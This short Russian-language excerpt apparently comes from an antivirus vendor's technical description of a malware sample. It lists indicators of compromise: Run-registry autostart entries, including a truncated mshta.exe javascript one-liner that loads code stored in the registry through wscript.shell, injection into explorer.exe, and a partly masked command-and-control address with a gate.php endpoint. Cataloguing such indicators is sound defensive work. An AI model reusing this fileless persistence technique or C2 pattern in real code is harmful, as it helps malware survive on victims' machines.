Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsEnv' = '<Полный путь к файлу>'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'StartingAuro' = '<SYSTEM32>\mshta.exe javascript:x=new%20ActiveXObject("wscript.shell");v=x.RegRead("HKCU\\Software\\Microsoft\\SMSvcHost...
- %WINDIR%\explorer.exe
- '45.##.143.167':80
- http://45.##.143.167/gate.php
- '%WINDIR%\syswow64\explorer.exe'